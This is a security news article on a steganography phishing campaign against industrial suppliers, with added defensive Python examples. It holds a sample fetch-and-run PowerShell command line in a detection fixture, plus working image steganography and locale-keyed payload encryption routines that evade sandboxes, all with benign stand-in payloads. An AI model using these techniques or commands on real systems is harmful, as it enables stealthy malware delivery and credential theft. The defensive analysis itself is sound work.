A targeted series of attacks on suppliers of equipment and software for industrial enterprises is playing out globally, researchers said, hinging on phishing and a steganography tactic to hide malware on public, legitimate image resources.
According to Kaspersky ICS CERT, the attacks seem bent on stealing Windows credentials in order to lay the groundwork for lateral movement inside a target network and follow-on activity. Victims have so far been identified in Germany, Italy, Japan and the U.K. The kill chain starts with phishing emails, which are written in the language of each specific victim.
“For example, in the case of an attack on a company from Japan, the text of a phishing email and a Microsoft Office document containing a malicious macro were written in Japanese,” researchers explained, in an analysis on Thursday. “Also, to successfully decrypt the malware module, the operating system must have had a Japanese localization as well.”
The emails contain an “urgent request” to open an attached document. It’s an Excel spreadsheet with a malicious macro; users are requested to enable active content, which triggers the malicious PowerShell script.
“The script is executed in spite of the configured policy, in a hidden window and without loading the user configuration,” according to Kaspersky.
The script then randomly selects one of the URLs hard-coded in it, all of which point to the legitimate public image-hosting services imgur.com and imgbox.com, downloads an image and begins extracting data from it.
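The macro-to-PowerShell handoff described above leaves a characteristic process-creation trail: an Office application spawning powershell.exe with a hidden window, no user profile and a bypassed execution policy, followed by a download from an image host. The Python below is an added example, not code from the Kaspersky report, that applies that logic to a few constructed Sysmon-style process-creation events. The paths, command lines and image URL in the sample events are invented for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
# These records are invented for this example and are not logs from the campaign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Ep Bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://i.imgur.com/abc123.png')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo hello"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -w hidden -ep bypass -enc SQBFAFgA"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -Command "Get-Date"'},
]

OFFICE_PARENTS = ("excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe")

# PowerShell accepts abbreviated switches, so each pattern covers the long and short forms.
SUSPICIOUS_FLAGS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),   # -W Hidden / -WindowStyle Hidden
    "no_profile":    re.compile(r"-nop(?:rofile)?\b", re.I),            # -NoP / -NoProfile
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),  # -Ep Bypass / -ExecutionPolicy Bypass
    "image_host":    re.compile(r"https?://(?:[\w.-]+\.)?(?:imgur|imgbox)\.com/", re.I),
}


def evaluate(event):
    """Return an alert dict for a suspicious PowerShell launch, or None."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return None
    hits = [name for name, rx in SUSPICIOUS_FLAGS.items() if rx.search(event["CommandLine"])]
    office_parent = parent in OFFICE_PARENTS
    # An Office parent is reason enough on its own (macros have no business launching
    # PowerShell); otherwise require at least two stealth indicators so that ordinary
    # admin scripts using a single -NoProfile do not page anyone.
    if office_parent or len(hits) >= 2:
        return {"parent": parent, "office_parent": office_parent, "indicators": hits}
    return None


def scan(events):
    """Run the rule over a list of events and return only the alerts."""
    return [alert for alert in (evaluate(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Hunting for the image-host download alone is weak, since those hosts see plenty of legitimate traffic; the parent-child relationship and the stealth switches are the part of the chain that does not change when the attackers rotate URLs.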
Steganography Tactic
The data is hidden in the pixels of the downloaded image and is parsed out by an algorithm in the script. Hiding a payload inside an image file, known as steganography, is a well-known though relatively uncommon way to evade detection: many filters and gateways let image formats pass without much scrutiny.
In this case, the extracted data is wrapped in several layers (Base64 encoding and RSA encryption); once decrypted and decoded, it is assembled into a second PowerShell script, an approach Kaspersky flagged as advanced.
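To make the pixel-extraction step concrete, here is an added Python example (not the campaign's own algorithm and not code from the Kaspersky report) that hides a Base64-encoded PowerShell one-liner in the least significant bits of an RGB pixel buffer and recovers it the way a loader would. The pixel buffer is constructed in code and stands in for a decoded PNG; the RSA layer is left out, and the length header and the one-liner are assumptions made for the illustration.

```python
import base64

# Constructed stand-in for the second-stage script that the real loader assembles.
STAGE2_SCRIPT = "Write-Host 'stage two'"


def make_image(width, height):
    """Constructed carrier: a flat list of (r, g, b) tuples forming a gradient.
    Stands in for a PNG decoded with an image library; no dependency needed."""
    return [((x * 7) % 256, (y * 13) % 256, (x + y) % 256)
            for y in range(height) for x in range(width)]


def embed(pixels, payload):
    """Write payload into the least significant bit of each colour channel, in
    pixel order, prefixed with a 32-bit big-endian length so the extractor knows
    where to stop. Every channel changes by at most 1, so the image looks identical."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(pixels) * 3:
        raise ValueError("carrier too small for payload")
    it = iter(bits)
    out = []
    for px in pixels:
        channels = []
        for c in px:
            bit = next(it, None)  # once the bits run out, leave the channel untouched
            channels.append(c if bit is None else (c & 0xFE) | bit)
        out.append(tuple(channels))
    return out


def extract(pixels):
    """Inverse of embed: read the LSBs in the same order, rebuild the length
    header, then the payload. A header that exceeds the carrier's capacity means
    the image was never a carrier (or used a different scheme)."""
    bits = (c & 1 for px in pixels for c in px)

    def take_bytes(n):
        return bytes(sum(next(bits) << (7 - i) for i in range(8)) for _ in range(n))

    length = int.from_bytes(take_bytes(4), "big")
    if length > len(pixels) * 3 // 8 - 4:
        raise ValueError("length header exceeds carrier capacity: not a stego image?")
    return take_bytes(length)


def hide_script(pixels, script):
    """Attacker side: Base64 the script (the first wrapping layer in the article), then embed."""
    return embed(pixels, base64.b64encode(script.encode("utf-8")))


def recover_script(pixels):
    """Loader side: extract the bytes from the pixels and strip the Base64 layer."""
    return base64.b64decode(extract(pixels)).decode("utf-8")


if __name__ == "__main__":
    carrier = make_image(64, 64)
    stego = hide_script(carrier, STAGE2_SCRIPT)
    print(recover_script(stego))
```

Note what this means for a network sensor: the stego image is a valid image with the same dimensions and, to the eye, the same content as the carrier. Detection has to happen on the endpoint, at the point where a script reads pixel values and turns them into code, not on the wire.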
“The malicious module is encoded in an image using steganographic techniques and the image is hosted on legitimate web resources,” according to the research. “This makes it virtually impossible to detect such malware using network traffic monitoring and control tools while it is being downloaded. From the standpoint of technical solutions, this activity is indistinguishable from sending ordinary requests to legitimate image hosting services.”
Here too, the campaign's country-specific tailoring is evident.
“Curiously, the script has an error in its code, included on purpose, with the exception message used as the decryption key,” said the researchers. “Notably, the text in the exception message depends on the language pack installed in the operating system. Apparently, the attackers prepare the malicious script specifically for victims from a particular country.”
The use of the exception message as the decryption key for the malicious payload is notable, the researchers said, and it can also help the malware evade detection in sandboxes: an analysis environment running a different language pack produces a different message, and therefore a different key, so the payload never decrypts. It also “makes analyzing the functionality of the malware significantly more difficult for researchers if they do not know what language pack was used on the victim’s computer,” they said.
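The following added Python example (not the campaign's code, and not its cipher) shows the mechanism: a deliberate error is triggered, the text of the resulting exception is stretched into a key, and the payload only decrypts on a host whose language pack yields the expected text. The localized message strings are invented stand-ins, not real Windows messages; the SHA-256-based keystream, XOR cipher and `PS1:` marker are assumptions made for the illustration. The last function shows the analyst's counter-move of trying every candidate language pack.

```python
import hashlib

# Constructed stand-in for the locale-dependent text of one and the same exception.
# These are NOT real Windows messages; the point is only that the string differs per
# language pack, so the key derived from it differs too.
LOCALIZED_MESSAGES = {
    "en-US": "Cannot convert value to type System.Int32.",
    "ja-JP": "値を型 System.Int32 に変換できません。",
    "de-DE": "Der Wert kann nicht in den Typ System.Int32 konvertiert werden.",
}

MAGIC = b"PS1:"  # marker the loader checks before executing what it decrypted


def exception_message(locale):
    """Simulates provoking the deliberate error and reading its message. On a real
    host the installed language pack, not a parameter, decides which text comes back."""
    try:
        raise ValueError(LOCALIZED_MESSAGES[locale])
    except ValueError as err:
        return str(err)


def derive_key(message, length):
    """Stretch the message into a keystream with SHA-256 in counter mode
    (illustrative; the campaign's actual scheme is not described in the article)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(message.encode("utf-8") + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def xor(data, key):
    return bytes(a ^ b for a, b in zip(data, key))


def build_payload(script, target_locale):
    """Attacker side: encrypt the script for one specific language pack."""
    plain = MAGIC + script.encode("utf-8")
    return xor(plain, derive_key(exception_message(target_locale), len(plain)))


def run_loader(blob, host_locale):
    """Victim side: derive the key from whatever message this host produces.
    Returns the script on a matching host and None anywhere else, which is
    exactly what happens in a sandbox with a different language pack."""
    plain = xor(blob, derive_key(exception_message(host_locale), len(blob)))
    if not plain.startswith(MAGIC):
        return None
    return plain[len(MAGIC):].decode("utf-8", errors="replace")


def analyst_bruteforce(blob, candidate_messages):
    """Analyst side: without the victim's machine, try every candidate message
    and report which language pack the payload was built for."""
    for locale, msg in candidate_messages.items():
        plain = xor(blob, derive_key(msg, len(blob)))
        if plain.startswith(MAGIC):
            return locale
    return None


if __name__ == "__main__":
    blob = build_payload("Write-Host 'stage three'", "ja-JP")
    print("ja-JP host:", run_loader(blob, "ja-JP"))
    print("en-US sandbox:", run_loader(blob, "en-US"))
    print("built for:", analyst_bruteforce(blob, LOCALIZED_MESSAGES))
```

The practical lesson for defenders is in the last function: the technique is only as strong as the analyst's ignorance of the victim's locale, so a sandbox fleet that covers the language packs your organisation actually deploys, or a harness that simply tries each candidate message, removes the advantage.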
Meanwhile, the second PowerShell script in turn unpacks itself into a third PowerShell script, which turns out to be an obfuscated sample of the Mimikatz utility, used to steal Windows account credentials from a compromised system.
“Criminals can use this information to gain access to other systems on the enterprise network and move laterally,” according to the analysis. “It is a particularly dangerous situation if attackers obtain the credentials for accounts with domain administrator privileges.”
The ultimate goal of the criminals remains unknown, researchers said.
“The use of [steganography], combined with the pinpoint nature of the infections, indicates that these were targeted attacks,” the researchers concluded. “It is a matter of concern that attack victims include contractors of industrial enterprises. If the attackers are able to harvest the credentials of a contractor organization’s employees, this can lead to a range of negative consequences, from the theft of sensitive data to attacks on industrial enterprises via remote administration tools used by the contractor.”